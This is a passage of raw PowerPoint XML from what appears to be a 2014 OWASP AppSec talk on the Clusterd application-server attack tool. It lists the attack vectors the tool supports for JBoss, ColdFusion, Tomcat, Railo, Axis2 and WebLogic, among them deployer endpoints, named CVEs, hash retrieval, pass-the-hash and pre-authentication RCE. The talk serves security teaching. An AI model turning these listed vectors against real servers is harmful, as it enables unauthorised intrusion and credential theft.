                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for 3.x, 4.x, and 6.x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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-console/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeploymentFileRepository</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for 3.x, 4.x, and 5.x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/web-console/Invoker (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MainDeployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) for 3.x, 4.x, and 6.x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/web-console/Invoker (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSHDeployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) for 3.x and 4.x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/invoker/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JMXInvokerServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for 3.x, 4.x, and 5.x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/invoker/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EJBInvokerServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for 3.x, 4.x, and 5.x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/management for 7.x, 8.x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Dump deployed WARs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Fetch host OS information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Verb tampering vulnerability (CVE-2010-0738)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Credential/path disclosure (CVE-2005-2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ColdFusion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Versions 6 - 11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Currently supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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Task Scheduler for 7.x, 8.x, 9.x, 10.x, and 11.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FCKeditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for 8.x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LFI Log Injection 6.x, 7.x, and 8.x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Hash retrieval for versions 6 - 10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RDS admin bypass (CVE-2013-0632)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Pass the hash authentication for versions 7 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9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1400" dirty="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Versions 3.x - 8.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Currently can deploy to all versions with an exposed manager interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Dump deployed WARs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Fetch host OS information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Versions 3.x - 4.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>scheduler for 3.x and 4.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Fetch host OS information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Axis2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Versions 1.4 - 1.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>interface for 1.4, 1.5, and 1.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Fetch host OS information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>View deployed services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Credential disclosure for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>1.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebLogic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Versions 7, 8.1, 11, and 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over T3 and T3S currently tested against 11.x and 12.x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Dump deployed WARs over T3/T3S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Fetch host OS information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="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Clusterd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061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even more…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7620000" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version 0.40, just released on 9/14/14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Glassfish now supported; this includes versions 3.0, 3.1, and 4.x Not all functions are supported for the platform yet, as it's kind of a crappy platform, but it's still in progress. Early support stable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    Platform-specific flags no longer included in the default help output. This was primarily done to improve help readability and prevent overflowing the user with potentially irrelevant information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    The --aux-list and --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>-list flags now support a platform argument to print only platform-specific modules. All platforms/modules may still be printed by not providing an argument.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    Significant modules added for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>; pre-authentication LFI and pre-authentication RCE added.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    Another post-authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> (log_injection.py) added for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>    ColdFusion 5 fingerprint and support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>added</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="160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02050"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="OWASP_APPSEC_201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nset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F8369596-CB40-4A0C-B9E9-E6912BAD0702}" vid="{21E5E70F-E633-430A-AF83-05BD052C3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AppSecUSA2014.v5</Template>
  <TotalTime>0</TotalTime>
  <Words>1723</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>313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Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>HouseGothicHG23Text</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>OWASP_APPSEC_2014</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Permissions</vt:lpstr>
      <vt:lpstr>Application Servers</vt:lpstr>
      <vt:lpstr>Why Clusterd? </vt:lpstr>
      <vt:lpstr>Why Clusterd? </vt:lpstr>
      <vt:lpstr>Why Clusterd?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Attack Surface – JBOSS </vt:lpstr>
      <vt:lpstr>The Attack Surface – Coldfusion </vt:lpstr>
      <vt:lpstr>The Attack Surface – Tomcat </vt:lpstr>
      <vt:lpstr>The Attack Surface – Railo</vt:lpstr>
      <vt:lpstr>The Attack Surface – Axis2</vt:lpstr>
      <vt:lpstr>The Attack Surface – Weblogic </vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>--Aux-List</vt:lpstr>
      <vt:lpstr>--Deployer-list</vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>Clusterd Intro</vt:lpstr>
      <vt:lpstr>Hands-on</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Target 1</vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1 </vt:lpstr>
      <vt:lpstr>Target 1</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
      <vt:lpstr>Target 2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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2014-08-12T02:57:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-09-15T04:32:32Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>